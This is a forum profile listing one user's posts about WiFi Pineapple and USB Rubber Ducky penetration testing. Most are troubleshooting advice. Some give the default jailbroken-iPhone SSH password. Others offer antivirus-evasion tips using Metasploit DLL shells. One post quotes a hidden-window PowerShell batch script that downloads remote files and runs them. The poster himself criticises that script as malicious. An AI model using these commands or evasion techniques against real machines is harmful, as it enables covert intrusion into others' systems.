Xcellerator

Active Members
  • Posts: 285
  • Joined
  • Last visited
  • Days Won: 10

Everything posted by Xcellerator

  1. Not gonna happen, I'm afraid. You'd need to be able to get root access to the device remotely. That in itself is pretty unlikely! *IF* you were able to get SSH access to the device (funnily enough, this is still pretty common on jailbroken iPhones, try root:alpine) then you can SCP out anything you like. On Androids, people tend to be a lot more tech-savvy and lock down their SSH or at least change the default password. It's not as simple as just 'copying out their preconfigured password files'. The apps are pretty darn secure, and you're not gonna be able to just sniff out the logins because they remain authenticated unless the app is force-closed. Even if the internet connection is lost or the server is unavailable, they still won't attempt to re-authenticate. You'd have to be pretty damn lucky to grab a login from an app. As far as I know, SSL/TLS can't be downgraded to HTTPS/SSL 2.0, so yeah, sslstrip isn't gonna work. It's actually surprising that sslstrip has remained working this long!
  2. Technically, it's the same process. But putting wlan1 in monitor mode is preferred because it's the 'free' card and is also the 'better' card (RTL8187). wlan0 is the Atheros card and will typically be in managed mode and act as an AP.
  3. The wiki is your friend! ;) http://wiki.wifipineapple.com/index.php/Serial_UART
  4. Really? That's interesting! Will there be a detailed breakdown of what those weaknesses are along with the eventual update? It'll be interesting to read about.
  5. It's actually harder than it sounds. Even if you cut off the connection to Facebook or Twitter, you wouldn't sign them out. Try putting your phone in airplane mode then open Facebook, it just says "no connection". Even forwarding requests from "http://www.facebook.com/logout.php" won't work, you just get redirected to "/home.php". I guess it's down to either some kind of cookie or session type thing or maybe some PHP voodoo. Haven't actually checked on my own Pineapple, but is there a way to do session hijacking? Would probably be the closest to what you're after. Surprisingly, sites like Facebook and Twitter are actually pretty good at keeping user details tied up in little bows so nasty hackers can't get to them.
  6. The wiki is your friend. http://wiki.wifipineapple.com/index.php/Karma Read the last section. What devices are you trying to hijack using Karma? It will help to see if it's a bug or just the way that Karma works.
  7. Even then, some crypters actually INCREASE the likelihood of detection due to the fact that the engine has to be in the stub somewhere so that the code can be decrypted at runtime. That's why there are lots of EXE encryption engines, but only a few are actually used by the majority.
  8. It depends on what you're trying to get past the AV. Antivirus works in lots of ways; for instance, a 'file shield' works by detecting known signatures within files that are being transferred to the hard disk. Many AVs also have firewalls, web page scanners, email client scanners, and some even have P2P network shields. It would help to know what it is you're trying to achieve. Is it just executing a binary on a remote host?
  9. The name you set in the Karma configuration is the SSID given to wlan0. Before, it would have been "Pineapple5_<last two octets of MAC address>". You might as well set it to something inconspicuous like "NETGEAR" or "linksys".
  10. It's not hardware based, as the hardware itself can't change. As far as hardware is concerned (for WiFi anyway), it's very simple physics and only works in the way it's built. However, it's all down to the software used to interface the hardware. Developers patch up their OS to avoid broadcasting requests while connected to a network. For this reason, you'll find devices fit into three categories:
      1. Karma works as it always has (getting rare, usually old phones that people don't bother updating)
      2. Karma works intermittently (only broadcasts requests when not connected, i.e. searching for a known SSID)
      3. Karma doesn't work at all
      You should try sending out deauth packets to disconnect a client and then see if Karma works (meaning it's in category 2).
  11. SkyDrive is good. I know you used to be able to use GoogleDrive, but not 100% sure if you still can. 9/10 I just host the file myself and get the script to connect back to me - usually it's a shell anyway, so I'm on the network. If they're just scripts, then pastebin takes care of everything.
  12. Yeah, Karma doesn't really work on anything newer than ~2012. Theoretically it's possible to get it working again, and this has been hinted at by the Devs, but very little has actually been said. Besides, Karma is by no means the main selling point of the Pineapple anymore; the project has expanded to be much more.
  13. You cannot just grab direct download links from mediafire. You agree, while using MediaFire Services, that you may not: . . . Use any robot, spider, offline readers, site search and/or retrieval application, or other device to retrieve or index any portion of the Services, with the exception of public search engines; from: http://www.mediafire.com/policies/terms_of_service.php
  14. What payloads have you been trying? Post the scripts, also what OS are you testing against?
  15. I'd recommend using the Metasploit framework. I make all my shells through it. It's better than using the same exe every time because you can add encoding options and even run the whole connection over HTTPS rather than TCP. Seeing as you're using the Ducky, I'd recommend generating a DLL rather than an exe - much lower AV detection rate. Run a DLL using this: rundll32.exe file.dll, @DllMain12
  16. What you're asking for is a bind shell rather than a reverse shell. A bind shell works by the target computer literally binding its shell to a port that you connect to. A reverse shell works by the target computer connecting to you over a port and then providing the shell. Both have the same effect but achieve it in very different ways.
  17. Well, the machines I've tested on (PowerShell in Windows, and wget in Linux) both just downloaded a web page. What version of Windows did you test on? Can you post a screenshot of the download being successful? As in the PowerShell command (without the hidden window style bit) and then 'type' the bat file? @echo off powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1505.mediafire.com/uqxpahdvmi5g/iqgb5774sqcyu7c/updater.vbs','C:\updater.vbs') powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1647.mediafire.com/dhhclv61cblg/gjnalpa67hvpb43/update.bat','C:\update.bat') powershell -windowstyle hidden Start-Process "C:\updater.vbs" This is what the initial bat file is when you download it through MediaFire.
  18. How about you try: wget http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat; cat Runner1.bat and then tell me it works. I see no reason for you to be offensive (the preschool remark); I've merely given my opinion that I think what you're doing is immoral and not in line with what (the majority) of this community is about. I also pointed out an actual problem with your script (although I disagree with its purpose, I think that the execution is clever). MediaFire don't allow direct downloads via links; they want you to go to their site and click the link manually, which forwards you around some PHP (or ASP, whatever they use..) to serve up the download. It stops people mass downloading huge files from their servers and clogging up their bandwidth. A better idea would be to stick it on pastebin and use the raw link they'll give you (seeing as it's essentially just text files you're downloading). I wrote a Ducky script using this technique to add an open WiFi network to a Windows machine (to autoconnect to the Pineapple). You can see it here if you like: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Pineapple-Assocation-(VERY-FAST) Backdoors can be used as a demonstration of "hey look, in just a few seconds I installed this thing that lets me access all your stuff - you should really fix this so that someone doesn't come along and cause some real damage" - that's what I'd use it for anyway.
  19. By all means, demonstrate to a person or corporation the risks posed by physical security, but what you're proposing is just causing unnecessary harm and wasting the time of other people. Dunno about you, but I see hacking as a way of furthering my own understanding and fixing holes in security - not deliberately using my own knowledge to harm or annoy others. Also, you obviously haven't tested your script - the download points to MediaFire. Try wgetting that; all you get is an HTML page. I understand where you're coming from, and there's nothing wrong with payloads that download and run scripts. It's what the script does that's the problem. Changing someone's wallpaper or planting a backdoor isn't anything like causing popups every minute - and they're persistent after reboot.
  20. Generally, if possible, I try and get a bit of info about the machine first. I take a look at the keyboard they're using, (Dell, Microsoft, etc) and try and go from there. Doesn't always work, but most of the time I can bypass the whole driver installation business.
  21. This is just malicious, and all it would do is take up some poor admin's time to fix it. Spreading across a network just exacerbates the problem. Teach people about physical security by demonstration, not by causing harm to them or interrupting their workflow - that doesn't help anyone.
  22. Good to hear! Looking forward to the update!
  23. Fantastic! Works perfectly! Anyone happen to know why this is the case?
  24. Not sure exactly where this should go; it's not an issue with a particular infusion, but a general one. Has anyone else had trouble with the "-1" channel problem? I've been getting it when using Bully and Airodump. Bully in particular won't let me do anything at all. I get an error about being unable to set the channel on mon0. I had the same problem with the aircrack-ng suite on my laptop, but I just compiled the bleeding-edge version which has an --ignore-negative-one option. That solved it in the sense that I could use the program, but it still said "CH: -1" at the top. Anyone else had anything like this?
  25. Yeah, I've noticed a huge stability boost from using the 2 amp USB rather than the 1 amp one. Both output 5V.